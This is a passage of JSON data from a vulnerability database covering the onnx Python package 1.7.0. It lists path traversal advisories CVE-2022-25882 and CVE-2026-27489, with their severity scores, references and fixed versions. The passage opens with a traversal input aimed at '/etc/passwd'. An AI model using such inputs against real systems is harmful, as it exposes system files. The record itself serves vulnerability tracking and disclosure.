\"../../../etc/passwd\"","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2022-25882","reference_id":"","reference_type":"","scores":[{"value":"0.05827","scoring_system":"epss","scoring_elements":"0.9071","published_at":"2026-06-06T12:55:00Z"},{"value":"0.05827","scoring_system":"epss","scoring_elements":"0.90722","published_at":"2026-06-09T12:55:00Z"},{"value":"0.05827","scoring_system":"epss","scoring_elements":"0.90706","published_at":"2026-06-08T12:55:00Z"},{"value":"0.05827","scoring_system":"epss","scoring_elements":"0.90708","published_at":"2026-06-07T12:55:00Z"},{"value":"0.05827","scoring_system":"epss","scoring_elements":"0.90698","published_at":"2026-06-04T12:55:00Z"},{"value":"0.05827","scoring_system":"epss","scoring_elements":"0.90711","published_at":"2026-06-05T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2022-25882"},{"reference_url":"https://gist.github.com/jnovikov/02a9aff9bf2188033e77bd91ff062856","reference_id":"","reference_type":"","scores":[{"value":"7.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N"},{"value":"7.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N/E:P"},{"value":"8.7","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:Y/T:P/P:M/B:A/M:M/D:T/2025-04-01T14:53:52Z/"}],"url":"https://gist.github.com/jnovikov/02a9aff9bf2188033e77bd91ff062856"},{"reference_url":"https://github.com/onnx/onnx","reference_id":"","reference_type":"","scores":[{"value":"7.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N"},{"value":"8.7","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/onnx/onnx"},{"reference_url":"https://github.com/onnx/onnx/blob/96516aecd4c110b0ac57eba08ac236ebf7205728/onnx/checker.cc%23L129","reference_id":"","reference_type":"","scores":[{"value":"7.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N"},{"value":"7.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N/E:P"},{"value":"8.7","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:Y/T:P/P:M/B:A/M:M/D:T/2025-04-01T14:53:52Z/"}],"url":"https://github.com/onnx/onnx/blob/96516aecd4c110b0ac57eba08ac236ebf7205728/onnx/checker.cc%23L129"},{"reference_url":"https://github.com/onnx/onnx/commit/f369b0e859024095d721f1d1612da5a8fa38988d","reference_id":"","reference_type":"","scores":[{"value":"7.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N"},{"value":"7.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N/E:P"},{"value":"8.7","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:Y/T:P/P:M/B:A/M:M/D:T/2025-04-01T14:53:52Z/"}],"url":"https://github.com/onnx/onnx/commit/f369b0e859024095d721f1d1612da5a8fa38988d"},{"reference_url":"https://github.com/onnx/onnx/issues/3991","reference_id":"","reference_type":"","scores":[{"value":"7.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N"},{"value":"7.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N/E:P"},{"value":"8.7","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:Y/T:P/P:M/B:A/M:M/D:T/2025-04-01T14:53:52Z/"}],"url":"https://github.com/onnx/onnx/issues/3991"},{"reference_url":"https://github.com/onnx/onnx/pull/4400","reference_id":"","reference_type":"","scores":[{"value":"7.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N/E:P"},{"value":"7.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N"},{"value":"8.7","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:Y/T:P/P:M/B:A/M:M/D:T/2025-04-01T14:53:52Z/"}],"url":"https://github.com/onnx/onnx/pull/4400"},{"reference_url":"https://github.com/pypa/advisory-database/tree/main/vulns/onnx/PYSEC-2023-38.yaml","reference_id":"","reference_type":"","scores":[{"value":"7.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N"},{"value":"8.7","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/pypa/advisory-database/tree/main/vulns/onnx/PYSEC-2023-38.yaml"},{"reference_url":"https://security.snyk.io/vuln/SNYK-PYTHON-ONNX-2395479","reference_id":"","reference_type":"","scores":[{"value":"7.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N/E:P"},{"value":"7.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N"},{"value":"8.7","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:Y/T:P/P:M/B:A/M:M/D:T/2025-04-01T14:53:52Z/"}],"url":"https://security.snyk.io/vuln/SNYK-PYTHON-ONNX-2395479"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2022-25882","reference_id":"CVE-2022-25882","reference_type":"","scores":[{"value":"7.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N"},{"value":"8.7","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2022-25882"},{"reference_url":"https://github.com/advisories/GHSA-ffxj-547x-5j7c","reference_id":"GHSA-ffxj-547x-5j7c","reference_type":"","scores":[{"value":"HIGH","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-ffxj-547x-5j7c"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/31236?format=json","purl":"pkg:pypi/onnx@1.13.0","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-2p7h-ajfk-uugy"},{"vulnerability":"VCID-7djm-gpg9-yfgg"},{"vulnerability":"VCID-ctup-6gs9-dkb6"},{"vulnerability":"VCID-mz2c-nefk-8ffx"},{"vulnerability":"VCID-ptv3-f9vq-vfcc"},{"vulnerability":"VCID-rs2r-qmck-4qgh"},{"vulnerability":"VCID-seht-766r-kke7"},{"vulnerability":"VCID-u796-p1fa-ubf5"},{"vulnerability":"VCID-vufm-7t73-xfgt"},{"vulnerability":"VCID-zxt4-rysw-hbf3"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:pypi/onnx@1.13.0"}],"aliases":["CVE-2022-25882","GHSA-ffxj-547x-5j7c","PYSEC-2023-38"],"risk_score":4.0,"exploitability":"0.5","weighted_severity":"8.0","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-vv5a-aqzk-kker"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/63876?format=json","vulnerability_id":"VCID-zxt4-rysw-hbf3","summary":"onnx: ONNX: Information Disclosure via Path Traversal Vulnerability","references":[{"reference_url":"https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2026-27489.json","reference_id":"","reference_type":"","scores":[{"value":"8.6","scoring_system":"cvssv3","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N"}],"url":"https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2026-27489.json"},{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2026-27489","reference_id":"","reference_type":"","scores":[{"value":"0.00031","scoring_system":"epss","scoring_elements":"0.09568","published_at":"2026-06-05T12:55:00Z"},{"value":"0.00031","scoring_system":"epss","scoring_elements":"0.09569","published_at":"2026-06-07T12:55:00Z"},{"value":"0.00031","scoring_system":"epss","scoring_elements":"0.09589","published_at":"2026-06-06T12:55:00Z"},{"value":"0.00033","scoring_system":"epss","scoring_elements":"0.09996","published_at":"2026-06-09T12:55:00Z"},{"value":"0.00033","scoring_system":"epss","scoring_elements":"0.09962","published_at":"2026-06-08T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2026-27489"},{"reference_url":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-27489","reference_id":"","reference_type":"","scores":[],"url":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-27489"},{"reference_url":"https://github.com/onnx/onnx","reference_id":"","reference_type":"","scores":[{"value":"8.7","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/onnx/onnx"},{"reference_url":"https://github.com/onnx/onnx/commit/4755f8053928dce18a61db8fec71b69c74f786cb","reference_id":"","reference_type":"","scores":[{"value":"8.7","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:Y/T:P/P:M/B:A/M:M/D:T/2026-04-01T19:08:27Z/"}],"url":"https://github.com/onnx/onnx/commit/4755f8053928dce18a61db8fec71b69c74f786cb"},{"reference_url":"https://github.com/onnx/onnx/security/advisories/GHSA-3r9x-f23j-gc73","reference_id":"","reference_type":"","scores":[{"value":"HIGH","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"8.7","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:Y/T:P/P:M/B:A/M:M/D:T/2026-04-01T19:08:27Z/"}],"url":"https://github.com/onnx/onnx/security/advisories/GHSA-3r9x-f23j-gc73"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2026-27489","reference_id":"","reference_type":"","scores":[{"value":"8.7","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2026-27489"},{"reference_url":"https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=1133190","reference_id":"1133190","reference_type":"","scores":[],"url":"https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=1133190"},{"reference_url":"https://bugzilla.redhat.com/show_bug.cgi?id=2453929","reference_id":"2453929","reference_type":"","scores":[],"url":"https://bugzilla.redhat.com/show_bug.cgi?id=2453929"},{"reference_url":"https://github.com/advisories/GHSA-3r9x-f23j-gc73","reference_id":"GHSA-3r9x-f23j-gc73","reference_type":"","scores":[{"value":"HIGH","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-3r9x-f23j-gc73"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/49109?format=json","purl":"pkg:pypi/onnx@1.21.0","is_vulnerable":false,"affected_by_vulnerabilities":[],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:pypi/onnx@1.21.0"}],"aliases":["CVE-2026-27489","GHSA-3r9x-f23j-gc73"],"risk_score":4.0,"exploitability":"0.5","weighted_severity":"8.0","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-zxt4-rysw-hbf3"}],"fixing_vulnerabilities":[],"risk_score":"4.1","resource_url":"http://public2.vulnerablecode.io/packages/pkg:pypi/onnx@1.7.0"}